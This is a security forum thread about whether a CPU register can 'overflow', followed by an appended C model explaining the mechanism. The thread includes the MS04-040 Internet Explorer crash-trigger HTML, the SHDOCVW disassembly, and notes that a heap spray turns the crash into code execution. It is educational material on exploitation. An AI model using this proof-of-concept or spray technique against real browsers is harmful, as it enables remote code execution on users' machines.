Thread: EAX overflow (An Idea)

  1. #1 H@CK3R_ADI (Garage Member)

    EAX overflow (An Idea)

    Hello to all Garagians. Yesterday I got an idea: what about doing an EAX overflow? I just wanted to know what you think about this idea....

    Your questions, comments, suggestions, etc. are welcome.

  2. #2 (Garage Member, Chennai)

    Be more elaborate! There is no such thing as a register overflow (except arithmetic overflow, but that is not relevant to our discussion here); what actually happens is that we overflow the memory from where the register gets these values! So yeah, it doesn't matter if it is EAX or EBX or whatever, as long as the conditions facilitate code execution!

  3. #3
    EAX (or any register) is a kind of bucket: we sink it in a big tank, and no matter how much it is filled (or even overflowed), when we take it out it will contain only its fixed volume at most, no matter how long you keep it inside the tank.

    Kindly specify how else you want to overflow EAX.

  4. #4 fb1h2s (Security Researcher, India)

    Well, I think what you are trying to convey is: you tried some fuzzing and the app crashed with the EAX register overflown!!! Anyway, sebas has explained where you are wrong.

    The general idea is to get control of the program flow by taking control over some instruction via a controlled register.

    Check out this exploit.

    Garage4hackers Forum - dbpwoerammpl local exploit a different scenario

    Cheers.
    Hacking Is a Matter of Time Knowledge and Patience

  5. #5 H@CK3R_ADI (Garage Member)

    What about doing an indirect overflow: first load it into registers and then into memory?

  6. #6
    Overflowing my memory; elaborate a little more, this could be a new technique or may lead to a zero-day... "vinnu"

  7. #7 H@CK3R_ADI (Garage Member)

    This can be used to bypass security system(s): just load the value in a register, then into memory... What do you think? What about using this to execute malicious code?

  8. #8 (Garage Member, Chennai)

    Kindly be more elaborate by providing some pseudocode as to how you think it might happen! Then it will be easier for others to clarify.

  9. #9
    EAX can't be overflowed (because of course it's a register and not a memory range), but it can be written with bogus values, and such exploits already exist; it's not a new concept, though. One of those is use-after-free.

    A classical example would be Microsoft Security Bulletin MS04-040: Cumulative Security Update for Internet Explorer (889293).

    Code:
    <HTML>
    <body>
    <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"></IFRAME>
    </body>
    </HTML>

    It triggers a crash in SHDOCVW.dll:

    Code:
    769F6D36 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] // parameter overwritten on the stack
    769F6D39 85C0 TEST EAX,EAX
    769F6D3B ^0F84 45FBFFFF JE SHDOCVW.769F6886
    769F6D41 E9 560E0100 JMP SHDOCVW.76A07B9C
    769F6D46 8B4424 04 MOV EAX,DWORD PTR SS:[ESP+4]
    769F6D4A 8B80 00140000 MOV EAX,DWORD PTR DS:[EAX+1400]
    769F6D50 85C0 TEST EAX,EAX
    769F6D52 0F84 330E0100 JE SHDOCVW.76A07B8B
    769F6D58 FF7424 08 PUSH DWORD PTR SS:[ESP+8]
    769F6D5C 8B08 MOV ECX,DWORD PTR DS:[EAX] /// this is where things get shaped up?? works with a heap spray
    769F6D5E 68 98659C76 PUSH SHDOCVW.769C6598
    769F6D63 50 PUSH EAX
    769F6D64 FF11 CALL DWORD PTR DS:[ECX]


    Thanks!

  10. #10
    Namaste

    note the instructions:

    Code:
    769F6D5C 8B08 MOV ECX,DWORD PTR DS:[EAX] /// this is where things get shaped up?? works with a heap spray
    769F6D5E 68 98659C76 PUSH SHDOCVW.769C6598
    769F6D63 50 PUSH EAX
    769F6D64 FF11 CALL DWORD PTR DS:[ECX]
    What else do you need? It's a direct code execution vulnerability, and if you control EAX you control ECX, and there you are.

    EAX doesn't get any bogus value but user-supplied input (directly, or indirectly in this case).

    Again, registers do not overflow; they only take values according to their width (32-bit, 16-bit, 64-bit, etc.), and EAX takes a DWORD (all the general-purpose registers are 32-bit, and EAX is a 32-bit general-purpose register).

    A bucket will always contain a fixed volume every time you fill it completely (up to its maximum limit); overflowing water gets spilled out of the bucket, not inside it.

    ..."vinnu"
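To make the point of the last two posts concrete (EAX never "overflows"; each load simply replaces its 32-bit value, and what the attacker really controls is the memory the `MOV EAX,[EAX+1400]` / `MOV ECX,[EAX]` / `CALL [ECX]` chain walks through), here is an added C model of that call site. It is not code from the thread, from the MS04-040 advisory, or from SHDOCVW; the struct layouts, offsets, function names and the spray size are assumptions for illustration. It shows the three outcomes of the same instruction sequence: a legitimate object, a NULL member caught by the `TEST EAX,EAX`/`JE` guard, and a clobbered member pointer that lands anywhere inside a region the attacker has filled with fake objects.

```c
/* Added example (not from the thread): a C model of the SHDOCVW call site
 *
 *   MOV EAX,DWORD PTR SS:[ESP+4]      ; "this" pointer
 *   MOV EAX,DWORD PTR DS:[EAX+1400]   ; member object pointer
 *   TEST EAX,EAX / JE ...             ; only a NULL check
 *   MOV ECX,DWORD PTR DS:[EAX]        ; the object's vtable pointer
 *   CALL DWORD PTR DS:[ECX]           ; first vtable slot
 *
 * Layouts, offsets and names below are assumptions for illustration,
 * not the real SHDOCVW layout. */
#include <stddef.h>
#include <stdio.h>

typedef void (*slot_fn)(void);

struct vtable { slot_fn slot0; };          /* CALL [ECX] uses slot 0 */
struct object { struct vtable *vt; };      /* MOV ECX,[EAX] reads vt */
struct this_t { struct object *member; };  /* stands in for [this+0x1400] */

static int g_called;                       /* records which function ran */
static void legit_slot0(void)    { g_called = 1; }
static void attacker_slot0(void) { g_called = 2; }

/* The vulnerable call site. Returns -1 on the JE path, otherwise the id of
 * whichever function the indirect call reached. */
int dispatch(struct this_t *self)
{
    g_called = 0;
    struct object *eax = self->member;     /* MOV EAX,[EAX+1400] */
    if (eax == NULL)                       /* TEST EAX,EAX ; JE */
        return -1;
    struct vtable *ecx = eax->vt;          /* MOV ECX,[EAX] */
    ecx->slot0();                          /* CALL [ECX] */
    return g_called;
}

/* Normal case: member points at a live object with a legitimate vtable. */
int run_legit(void)
{
    static struct vtable vt = { legit_slot0 };
    struct object obj = { &vt };
    struct this_t self = { &obj };
    return dispatch(&self);
}

/* NULL member: the TEST/JE guard catches it and nothing is called. */
int run_null(void)
{
    struct this_t self = { NULL };
    return dispatch(&self);
}

/* Corrupted case: the member pointer has been clobbered (overwritten stack
 * parameter, dangling pointer after a free, ...) and now points into a
 * region the attacker filled ("sprayed") with fake objects whose vtable
 * pointer leads to attacker code. Any slot the bogus pointer lands on works,
 * which is why a spray does not need the exact address. */
#define SPRAY_SLOTS 4096                   /* assumed size, for the model */
static struct vtable fake_vt = { attacker_slot0 };
static struct object spray[SPRAY_SLOTS];

int run_corrupted(size_t landing_slot)
{
    for (size_t i = 0; i < SPRAY_SLOTS; i++)
        spray[i].vt = &fake_vt;            /* every slot -> fake vtable */
    /* bogus but non-NULL pointer: the NULL check does not help here */
    struct this_t self = { &spray[landing_slot % SPRAY_SLOTS] };
    return dispatch(&self);
}

int main(void)
{
    printf("legit:     %d\n", run_legit());        /* 1 */
    printf("null:      %d\n", run_null());         /* -1 */
    printf("corrupted: %d\n", run_corrupted(1337));/* 2 */
    return 0;
}
```

The register value is the same 32-bit pointer in every case; the difference lies entirely in what the memory at that pointer, and at the pointer stored there, contains. That is the whole reason a heap spray pairs with this kind of crash: it makes almost any value that ends up in EAX dereference into attacker-chosen data.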
